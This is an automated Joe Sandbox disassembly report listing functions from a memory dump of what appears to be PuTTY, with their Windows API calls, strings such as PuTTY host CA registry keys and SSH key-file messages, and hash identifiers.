Source File: 00000004.00000002.2066894864.0000000000161000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00160000, based on PE: true

Associated: 00000004.00000002.2063572601.0000000000160000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000004.00000002.2067160103.0000000000227000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000004.00000002.2067244461.0000000000260000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000004.00000002.2067244461.0000000000262000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000004.00000002.2067382159.0000000000268000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_160000_sxnoX.jbxd

Similarity

API ID: CallCatchFramesMatchNestedTypeUnexpectedUnwindtype_info::operator==
String ID: Xg!$csm$csm$csm
API String ID: 4119006552-1539939124
Opcode ID: 0df230dc4069ac13b11903e9a057cc673cfa8409d368c6d3446ec6682c983184
Instruction ID: e3d9e4022175cb6828dce4cc937e7ef11da2ba0f1adf67320401e68f6bca23db
Opcode Fuzzy Hash: 0df230dc4069ac13b11903e9a057cc673cfa8409d368c6d3446ec6682c983184
Instruction Fuzzy Hash: 31B16B3182022AFFCF19EFD4E8419AEB7B5BF18310B144159E8146B252C776DA79CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 001942A0 Relevance: 15.9, APIs: 2, Strings: 7, Instructions: 155COMMON

Download Yara Rule

APIs

Part of subcall function 0019BC00: RegCreateKeyExA.ADVAPI32(?,?,00000000,00000000,00000000,0002001F,00000000,?,00000000), ref: 0019BC76
Part of subcall function 0019BC00: RegCloseKey.ADVAPI32(?), ref: 0019BCBA

Part of subcall function 0019EA00: _strlen.LIBCMT ref: 0019EA0B
Part of subcall function 0019EA00: _strcat.LIBCMT ref: 0019EA27

Part of subcall function 0019BE40: RegQueryValueExA.ADVAPI32(?,?,00000000,?,00000000,?,001946D1,00000000,RandSeedFile), ref: 0019BE67
Part of subcall function 0019BE40: RegQueryValueExA.ADVAPI32(?,?,00000000,?,00000000), ref: 0019BE9F

_strlen.LIBCMT ref: 00194314

Part of subcall function 0019BF40: RegQueryValueExA.ADVAPI32(?,?,00000000,?,00000000,?,00194993,00000000,Recent sessions), ref: 0019BF66
Part of subcall function 0019BF40: RegQueryValueExA.ADVAPI32(?,?,00000000,?,00000000), ref: 0019BF9D

Part of subcall function 001C1690: _strlen.LIBCMT ref: 001C16A6

_strlen.LIBCMT ref: 0019433E

Strings

Validity, xrefs: 00194329
MatchHosts, xrefs: 00194368
PermitRSASHA512, xrefs: 00194420
PublicKey, xrefs: 001942FF
Software\SimonTatham\PuTTY\SshHostCAs, xrefs: 001942CA
PermitRSASHA256, xrefs: 00194405
PermitRSASHA1, xrefs: 001943EA

Memory Dump Source

Source File: 00000004.00000002.2066894864.0000000000161000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00160000, based on PE: true

Associated: 00000004.00000002.2063572601.0000000000160000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000004.00000002.2067160103.0000000000227000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000004.00000002.2067244461.0000000000260000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000004.00000002.2067244461.0000000000262000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000004.00000002.2067382159.0000000000268000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_160000_sxnoX.jbxd

Similarity

API ID: QueryValue_strlen$CloseCreate_strcat
String ID: MatchHosts$PermitRSASHA1$PermitRSASHA256$PermitRSASHA512$PublicKey$Software\SimonTatham\PuTTY\SshHostCAs$Validity
API String ID: 1841596437-2091482613
Opcode ID: 20f0f7c37b8ae82f3b152e6424d56931252ad3dd0d2df6e30ece906a6137099d
Instruction ID: bf1c6d0c35424b95349ff0ada22cd4bb11aa7c2f0a897e449bece0f87286ba00
Opcode Fuzzy Hash: 20f0f7c37b8ae82f3b152e6424d56931252ad3dd0d2df6e30ece906a6137099d
Instruction Fuzzy Hash: C74171E5D043006BDA106B70BD87F3B76D8AB65B48F08482CFD8A56243E775D925C6A3

Uniqueness

Uniqueness Score: -1.00%

Function 00194460 Relevance: 15.8, APIs: 1, Strings: 8, Instructions: 100COMMON

Download Yara Rule

APIs

Part of subcall function 0019BC00: RegCreateKeyExA.ADVAPI32(?,?,00000000,00000000,00000000,0002001F,00000000,?,00000000), ref: 0019BC76
Part of subcall function 0019BC00: RegCloseKey.ADVAPI32(?), ref: 0019BCBA

Part of subcall function 0019BF00: _strlen.LIBCMT ref: 0019BF10
Part of subcall function 0019BF00: RegSetValueExA.ADVAPI32(0019423C,?,00000000,00000001,00000000,-00000001,?,?,?,?,?,?,?,?,?,?), ref: 0019BF23

_strlen.LIBCMT ref: 001944E1

Part of subcall function 001C7450: ___from_strstr_to_strchr.LIBCMT ref: 001C74A5

Part of subcall function 0019BE00: RegSetValueExA.ADVAPI32(00000000,00194520,00000000,00000004,00000000,00000004,?,00000000,00194520,00000000,PermitRSASHA1,?), ref: 0019BE22

Part of subcall function 0019BCE0: RegCloseKey.ADVAPI32(00000000,001946DC,00000000), ref: 0019BCE4

Strings

CA record must have a name, xrefs: 00194556
Validity, xrefs: 001944F9
PermitRSASHA512, xrefs: 0019453B
PublicKey, xrefs: 001944C6
Software\SimonTatham\PuTTY\SshHostCAs, xrefs: 00194488, 00194567
PermitRSASHA256, xrefs: 00194528
PermitRSASHA1, xrefs: 00194515
Unable to create registry keyHKEY_CURRENT_USER\%s\%s, xrefs: 0019456C

Memory Dump Source

Source File: 00000004.00000002.2066894864.0000000000161000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00160000, based on PE: true

Associated: 00000004.00000002.2063572601.0000000000160000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000004.00000002.2067160103.0000000000227000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000004.00000002.2067244461.0000000000260000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000004.00000002.2067244461.0000000000262000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000004.00000002.2067382159.0000000000268000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_160000_sxnoX.jbxd

Similarity

API ID: CloseValue_strlen$Create___from_strstr_to_strchr
String ID: CA record must have a name$PermitRSASHA1$PermitRSASHA256$PermitRSASHA512$PublicKey$Software\SimonTatham\PuTTY\SshHostCAs$Unable to create registry keyHKEY_CURRENT_USER\%s\%s$Validity
API String ID: 1175142446-1463427279
Opcode ID: b4622f2c8e76aeb1c74b4246b9a9955d61c6540e6366e649890fc0b8a8f1bf69
Instruction ID: a237c8233d341737471fc48e792fff08f89de701c5604c07f8ccf4e636a39e13
Opcode Fuzzy Hash: b4622f2c8e76aeb1c74b4246b9a9955d61c6540e6366e649890fc0b8a8f1bf69
Instruction Fuzzy Hash: B221D6EAD141147BEF0277647C83E7A3A584F72B08F090074FD0999253FB92992596F7

Uniqueness

Uniqueness Score: -1.00%

Function 001D6380 Relevance: 14.3, APIs: 2, Strings: 6, Instructions: 296COMMON

Download Yara Rule

APIs

___from_strstr_to_strchr.LIBCMT ref: 001D6422
___from_strstr_to_strchr.LIBCMT ref: 001D6491

Strings

display name '%s' has no ':number' suffix, xrefs: 001D644E
unable to resolve host name '%s' in display name, xrefs: 001D6602
localhost, xrefs: 001D653B
local, xrefs: 001D64CD
unix:%d, xrefs: 001D6593
unix, xrefs: 001D64E1, 001D64FB

Memory Dump Source

Source File: 00000004.00000002.2066894864.0000000000161000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00160000, based on PE: true

Associated: 00000004.00000002.2063572601.0000000000160000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000004.00000002.2067160103.0000000000227000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000004.00000002.2067244461.0000000000260000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000004.00000002.2067244461.0000000000262000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000004.00000002.2067382159.0000000000268000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_160000_sxnoX.jbxd

Similarity

API ID: ___from_strstr_to_strchr
String ID: display name '%s' has no ':number' suffix$local$localhost$unable to resolve host name '%s' in display name$unix$unix:%d
API String ID: 601868998-1763953115
Opcode ID: 9e18e1b6a2be91380dd0981d3fd472747844be5d9fd912702dc46179729f0774
Instruction ID: e37891014870a8d159cc32a8507904fb5f7b7d45a74ca7ce4698cdc21878bb08
Opcode Fuzzy Hash: 9e18e1b6a2be91380dd0981d3fd472747844be5d9fd912702dc46179729f0774
Instruction Fuzzy Hash: E291A6F59007006BEB21AF24BC427277AE55F26744F18043DF88A96393F776E95887A3

Uniqueness

Uniqueness Score: -1.00%

Function 001882D0 Relevance: 12.6, APIs: 1, Strings: 6, Instructions: 302COMMON

Download Yara Rule

APIs

_strlen.LIBCMT ref: 00188842

Part of subcall function 001831D0: SendDlgItemMessageA.USER32(?,?,0000014B,00000000,00000000), ref: 00183254

Part of subcall function 00183280: SendDlgItemMessageA.USER32(?,?,00000143,00000000,?), ref: 00183307

Strings

CA key may not be a certificate (type is '%.*s'), xrefs: 001888FB
Cannot decode key: %s, xrefs: 0018891B
Invalid '%.*s' key data, xrefs: 0018898B
Invalid key (no key type), xrefs: 00188905
Unrecognised key type '%.*s', xrefs: 00188935
Unable to load host CA record '%s', xrefs: 001887EC

Memory Dump Source

Source File: 00000004.00000002.2066894864.0000000000161000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00160000, based on PE: true

Associated: 00000004.00000002.2063572601.0000000000160000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000004.00000002.2067160103.0000000000227000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000004.00000002.2067244461.0000000000260000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000004.00000002.2067244461.0000000000262000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000004.00000002.2067382159.0000000000268000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_160000_sxnoX.jbxd

Similarity

API ID: ItemMessageSend$_strlen
String ID: CA key may not be a certificate (type is '%.*s')$Cannot decode key: %s$Invalid '%.*s' key data$Invalid key (no key type)$Unable to load host CA record '%s'$Unrecognised key type '%.*s'
API String ID: 706372605-3650709019
Opcode ID: 0875b01877d8de3603175c87bee48db27ff3fdcf8c66e5c86774441e937d9cec
Instruction ID: afc2ad0ced200561a3b74a99b9932a18690a530c5b331b0ef306efa4051e5f57
Opcode Fuzzy Hash: 0875b01877d8de3603175c87bee48db27ff3fdcf8c66e5c86774441e937d9cec
Instruction Fuzzy Hash: 9D81C7B5D002007BD6107B61BC46E6B769DAF65759F484438FC0D92253FB22EB248BB3

Uniqueness

Uniqueness Score: -1.00%

Function 00168080 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 151COMMON

Download Yara Rule

APIs

IsZoomed.USER32 ref: 001680B3
GetDesktopWindow.USER32 ref: 0016815C
GetClientRect.USER32(00000000), ref: 00168166
IsZoomed.USER32 ref: 001681F1
SetWindowPos.USER32(00000000,00000000,00000000,?,?,00000116), ref: 00168252
InvalidateRect.USER32(00000000,00000001), ref: 00168270

Strings

(, xrefs: 00168127

Memory Dump Source

Source File: 00000004.00000002.2066894864.0000000000161000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00160000, based on PE: true

Associated: 00000004.00000002.2063572601.0000000000160000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000004.00000002.2067160103.0000000000227000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000004.00000002.2067244461.0000000000260000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000004.00000002.2067244461.0000000000262000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000004.00000002.2067382159.0000000000268000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_160000_sxnoX.jbxd

Similarity

API ID: RectWindowZoomed$ClientDesktopInvalidate
String ID: (
API String ID: 2702938005-3887548279
Opcode ID: 018f281e1d88dbcb3acd24521bb11a33060d2f2beafb54b3060f686775306353
Instruction ID: bb521daa725c1a2cc86e4ac1759e43d8a120916a14a0b6c048ba2d7567510fdf
Opcode Fuzzy Hash: 018f281e1d88dbcb3acd24521bb11a33060d2f2beafb54b3060f686775306353
Instruction Fuzzy Hash: F751E471604340AFD7159F24FD8EB2A7BE4EB95301F084928F946C72B1DB71E865DB12

Uniqueness

Uniqueness Score: -1.00%

Function 0018C240 Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 122fileCOMMON

Download Yara Rule

APIs

___from_strstr_to_strchr.LIBCMT ref: 0018C2D2
CreateFileA.KERNEL32(00000000,C0000000,00000000,00000000,00000003,40000000,00000000), ref: 0018C30D
GetLastError.KERNEL32 ref: 0018C380

Part of subcall function 0018C520: GetCommState.KERNEL32(00000000,?,?,?,?,?,?,?,?,00000000,00000000,00000000,00000000,0018C330,?), ref: 0018C53C

Part of subcall function 001C63A0: CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,00000000,?,?,?,?,?,?,?,00000000), ref: 001C63E1
Part of subcall function 001C63A0: InitializeCriticalSection.KERNEL32(002633E0,?,?,?,?,00000000,?,?,?,?,?,?,?,00000000,?,00000001), ref: 001C643A
Part of subcall function 001C63A0: CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,?,00000000,?), ref: 001C6448
Part of subcall function 001C63A0: CreateThread.KERNEL32(00000000,00000000,001C64A0,00000004,00000000), ref: 001C6472
Part of subcall function 001C63A0: CloseHandle.KERNEL32(00000000,?,?,?,?,?,00000000,?,?,?,?,?,?,?,00000000,?), ref: 001C647D

Part of subcall function 001C60C0: CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,00000000,?,?,?,00000000,?,00000001), ref: 001C6101
Part of subcall function 001C60C0: InitializeCriticalSection.KERNEL32(002633E0,?,?,?,00000000,?,?,?,00000000,?,00000001), ref: 001C614A
Part of subcall function 001C60C0: CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,00000000,?,?,?,00000000,?,00000001), ref: 001C6158
Part of subcall function 001C60C0: CreateThread.KERNEL32(00000000,00000000,001C61B0,00000004,00000000), ref: 001C6182
Part of subcall function 001C60C0: CloseHandle.KERNEL32(00000000,?,?,?,?,00000000,?,?,?,00000000,?,00000001), ref: 001C618D

Part of subcall function 0019EA00: _strlen.LIBCMT ref: 0019EA0B
Part of subcall function 0019EA00: _strcat.LIBCMT ref: 0019EA27

Strings

Opening '%s': %s, xrefs: 0018C391
\\.\, xrefs: 0018C2DC
Opening serial device %s, xrefs: 0018C2BF
%s%s, xrefs: 0018C2EB

Memory Dump Source

Source File: 00000004.00000002.2066894864.0000000000161000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00160000, based on PE: true

Associated: 00000004.00000002.2063572601.0000000000160000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000004.00000002.2067160103.0000000000227000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000004.00000002.2067244461.0000000000260000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000004.00000002.2067244461.0000000000262000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000004.00000002.2067382159.0000000000268000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_160000_sxnoX.jbxd

Similarity

API ID: Create$Event$CloseCriticalHandleInitializeSectionThread$CommErrorFileLastState___from_strstr_to_strchr_strcat_strlen
String ID: %s%s$Opening '%s': %s$Opening serial device %s$\\.\
API String ID: 3096320600-1737485005
Opcode ID: bcdb76ff79e076f93eb89506f05fd23c87c59cd1060789176c37a3043ee802cc
Instruction ID: bb6a55e579926296b5e894d041b2505b543e617f7dd6d5e7ec646b7de6e2820e
Opcode Fuzzy Hash: bcdb76ff79e076f93eb89506f05fd23c87c59cd1060789176c37a3043ee802cc
Instruction Fuzzy Hash: 7F4195F5A003006FE710AF24EC46F277AE8EF55758F050528F9099B293E771E9148BA2

Uniqueness

Uniqueness Score: -1.00%

Function 00162030 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 80windowCOMMON

Download Yara Rule

APIs

ShowCursor.USER32(00000001), ref: 00162670
GetCursorPos.USER32(?), ref: 00162682
IsZoomed.USER32 ref: 001626F5
GetWindowLongA.USER32(000000F0), ref: 00162707
SendMessageA.USER32(?,00000112,0000F090,?), ref: 0016273D

Strings

(, xrefs: 001626AA

Memory Dump Source

Source File: 00000004.00000002.2066894864.0000000000161000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00160000, based on PE: true

Associated: 00000004.00000002.2063572601.0000000000160000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000004.00000002.2067160103.0000000000227000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000004.00000002.2067244461.0000000000260000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000004.00000002.2067244461.0000000000262000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000004.00000002.2067382159.0000000000268000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_160000_sxnoX.jbxd

Similarity

API ID: Cursor$LongMessageSendShowWindowZoomed
String ID: (
API String ID: 1399778751-3887548279
Opcode ID: c1decf564f72c211e01a54069ecaf86e8311bc1a69c96bdbf1e8f7d93c496c84
Instruction ID: 794f0668429dbb81856c3b5c0e480393d1ae62b563930e781231bb96b75e1231
Opcode Fuzzy Hash: c1decf564f72c211e01a54069ecaf86e8311bc1a69c96bdbf1e8f7d93c496c84
Instruction Fuzzy Hash: D821B031608301AFE7249F64EC8DBAA77E1FB50301F48882CF986C61E1DBB49C54EB52

Uniqueness

Uniqueness Score: -1.00%

Function 00162016 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 79windowCOMMON

Download Yara Rule

APIs

ShowCursor.USER32(00000001), ref: 00162670
GetCursorPos.USER32(?), ref: 00162682
IsZoomed.USER32 ref: 001626F5
GetWindowLongA.USER32(000000F0), ref: 00162707
SendMessageA.USER32(?,00000112,0000F090,?), ref: 0016273D

Strings

(, xrefs: 001626AA

Memory Dump Source

Source File: 00000004.00000002.2066894864.0000000000161000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00160000, based on PE: true

Associated: 00000004.00000002.2063572601.0000000000160000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000004.00000002.2067160103.0000000000227000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000004.00000002.2067244461.0000000000260000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000004.00000002.2067244461.0000000000262000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000004.00000002.2067382159.0000000000268000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_160000_sxnoX.jbxd

Similarity

API ID: Cursor$LongMessageSendShowWindowZoomed
String ID: (
API String ID: 1399778751-3887548279
Opcode ID: 9b1fd4a45c6279ac08edd98e1aa08345db250316e8d23f0ec7b35349d81d764a
Instruction ID: cdc8c186bae7ac7f382221cda9862928d323d8de6505312b2faa44402de281d5
Opcode Fuzzy Hash: 9b1fd4a45c6279ac08edd98e1aa08345db250316e8d23f0ec7b35349d81d764a
Instruction Fuzzy Hash: 7521C431608301AFE7249F24EC8DBAA77E0FB50311F48882CF986C61E1DBB59C54EB52

Uniqueness

Uniqueness Score: -1.00%

Function 001C63A0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 76threadCOMMON

Download Yara Rule

APIs

CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,00000000,?,?,?,?,?,?,?,00000000), ref: 001C63E1
InitializeCriticalSection.KERNEL32(002633E0,?,?,?,?,00000000,?,?,?,?,?,?,?,00000000,?,00000001), ref: 001C643A
CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,?,00000000,?), ref: 001C6448
CreateThread.KERNEL32(00000000,00000000,001C64A0,00000004,00000000), ref: 001C6472
CloseHandle.KERNEL32(00000000,?,?,?,?,?,00000000,?,?,?,?,?,?,?,00000000,?), ref: 001C647D

Strings

USWVPh3&, xrefs: 001C6455

Memory Dump Source

Source File: 00000004.00000002.2066894864.0000000000161000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00160000, based on PE: true

Associated: 00000004.00000002.2063572601.0000000000160000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000004.00000002.2067160103.0000000000227000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000004.00000002.2067244461.0000000000260000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000004.00000002.2067244461.0000000000262000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000004.00000002.2067382159.0000000000268000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_160000_sxnoX.jbxd

Similarity

API ID: Create$Event$CloseCriticalHandleInitializeSectionThread
String ID: USWVPh3&
API String ID: 2660700835-1982909683
Opcode ID: 96d87903d51f72cd619b60f36c4c0c48f164d64df4b12b7a1877cfe46fa7d747
Instruction ID: 12d313e10c57ef59be51388470acb23108f563c7e41a97f541683f72c0d5af6b
Opcode Fuzzy Hash: 96d87903d51f72cd619b60f36c4c0c48f164d64df4b12b7a1877cfe46fa7d747
Instruction Fuzzy Hash: E6218CB0680300AFE3209F65EC4AF167BE4FB48B15F10451DFA499B2D1D7B1B504CB96

Uniqueness

Uniqueness Score: -1.00%

Function 001C60C0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 72threadCOMMON

Download Yara Rule

APIs

CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,00000000,?,?,?,00000000,?,00000001), ref: 001C6101
InitializeCriticalSection.KERNEL32(002633E0,?,?,?,00000000,?,?,?,00000000,?,00000001), ref: 001C614A
CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,00000000,?,?,?,00000000,?,00000001), ref: 001C6158
CreateThread.KERNEL32(00000000,00000000,001C61B0,00000004,00000000), ref: 001C6182
CloseHandle.KERNEL32(00000000,?,?,?,?,00000000,?,?,?,00000000,?,00000001), ref: 001C618D

Strings

USWVPh3&, xrefs: 001C6165

Memory Dump Source

Source File: 00000004.00000002.2066894864.0000000000161000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00160000, based on PE: true

Associated: 00000004.00000002.2063572601.0000000000160000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000004.00000002.2067160103.0000000000227000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000004.00000002.2067244461.0000000000260000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000004.00000002.2067244461.0000000000262000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000004.00000002.2067382159.0000000000268000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_160000_sxnoX.jbxd

Similarity

API ID: Create$Event$CloseCriticalHandleInitializeSectionThread
String ID: USWVPh3&
API String ID: 2660700835-1982909683
Opcode ID: eac8478480a1e33d26e4f8b64f37db677389fdb3f49f3a97a01423bb0a253909
Instruction ID: a0de0e56c49c1ba2eef35a65407d0de5936565edd6e94c1b8cf59f1ae4182a78
Opcode Fuzzy Hash: eac8478480a1e33d26e4f8b64f37db677389fdb3f49f3a97a01423bb0a253909
Instruction Fuzzy Hash: 63219D70784300AFE3209F24AC4EB067BE4AB48B15F104519FA499B2D1D7F0B5048BAA

Uniqueness

Uniqueness Score: -1.00%

Function 00162147 Relevance: 7.6, APIs: 5, Instructions: 95COMMON

Download Yara Rule

APIs

GlobalLock.KERNEL32 ref: 00162148
_strlen.LIBCMT ref: 0016233A
MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,-00000001,00000000,00000000), ref: 00162355
_strlen.LIBCMT ref: 00162369
MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,-00000001,00000000,00000000), ref: 0016237C

Memory Dump Source

Source File: 00000004.00000002.2066894864.0000000000161000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00160000, based on PE: true

Associated: 00000004.00000002.2063572601.0000000000160000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000004.00000002.2067160103.0000000000227000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000004.00000002.2067244461.0000000000260000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000004.00000002.2067244461.0000000000262000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000004.00000002.2067382159.0000000000268000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_160000_sxnoX.jbxd

Similarity

API ID: ByteCharMultiWide_strlen$GlobalLock
String ID:
API String ID: 2105387149-0
Opcode ID: fe9d61c48b137d40c345173d4886923c87001c751f3805ae90c22b4e39f4bef7
Instruction ID: 18bb7539c768714db226e0a3615ffd4fe79ae82f66d3039ba48c9644a89491ce
Opcode Fuzzy Hash: fe9d61c48b137d40c345173d4886923c87001c751f3805ae90c22b4e39f4bef7
Instruction Fuzzy Hash: 0521E7B2E4070476E32026606C87F7B329CEF55758F194134FE095A3C2FB65692482A6

Uniqueness

Uniqueness Score: -1.00%

Function 001C23B0 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 198COMMON

Download Yara Rule

APIs

_strlen.LIBCMT ref: 001C24D6

Strings

SSH PRIVATE KEY FILE FORMAT 1.1, xrefs: 001C23ED
file format error, xrefs: 001C23FE
wrong passphrase, xrefs: 001C25F6

Memory Dump Source

Source File: 00000004.00000002.2066894864.0000000000161000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00160000, based on PE: true

Associated: 00000004.00000002.2063572601.0000000000160000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000004.00000002.2067160103.0000000000227000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000004.00000002.2067244461.0000000000260000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000004.00000002.2067244461.0000000000262000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000004.00000002.2067382159.0000000000268000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_160000_sxnoX.jbxd

Similarity

API ID: _strlen
String ID: SSH PRIVATE KEY FILE FORMAT 1.1$file format error$wrong passphrase
API String ID: 4218353326-2390803400
Opcode ID: dfadbe707e1dedddd54e9e575467f29eb6caec1ad64648c325ff5a37e30da14e
Instruction ID: 04922e9059aef54541a0e20e81b284d727aaf68e38d02f94d4c1ecd10e1f3d4c
Opcode Fuzzy Hash: dfadbe707e1dedddd54e9e575467f29eb6caec1ad64648c325ff5a37e30da14e
Instruction Fuzzy Hash: 8261E7B1904300AFEB05AF24EC45B6ABBA5BF71308F08492CF84946253E771ED64C792

Uniqueness

Uniqueness Score: -1.00%

Function 001F0260 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 54libraryloaderCOMMON

Download Yara Rule

APIs

GetProcAddress.KERNEL32(00000000,GetNamedPipeClientProcessId), ref: 001F029C

Strings

kernel32.dll, xrefs: 001F0280
process id %lu, xrefs: 001F02F3
GetNamedPipeClientProcessId, xrefs: 001F0296

Memory Dump Source

Source File: 00000004.00000002.2066894864.0000000000161000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00160000, based on PE: true

Associated: 00000004.00000002.2063572601.0000000000160000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000004.00000002.2067160103.0000000000227000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000004.00000002.2067244461.0000000000260000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000004.00000002.2067244461.0000000000262000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000004.00000002.2067382159.0000000000268000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_160000_sxnoX.jbxd

Similarity

API ID: AddressProc
String ID: GetNamedPipeClientProcessId$kernel32.dll$process id %lu
API String ID: 190572456-462240408
Opcode ID: f5952e532434a30a868c80c4059e5e894485dbb9a32e5befe401d3f206f8f2e9
Instruction ID: 7cbfb764f2284c9cb3632084ba4bbce5c33ce65b5731cb5f2bf1a1b99b1dc775
Opcode Fuzzy Hash: f5952e532434a30a868c80c4059e5e894485dbb9a32e5befe401d3f206f8f2e9
Instruction Fuzzy Hash: 6B1186B0E15301AFDB19DF28FD5E76B36E5AB08700F058428F5458B2D2D771D900CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 001663F0 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 41windowCOMMON

Download Yara Rule

APIs

ShowCursor.USER32(00000001), ref: 00166429
MessageBoxA.USER32(?,00000000,00000010), ref: 00166440
PostQuitMessage.USER32(00000001), ref: 00166476

Strings

%s Fatal Error, xrefs: 001663FC

Memory Dump Source

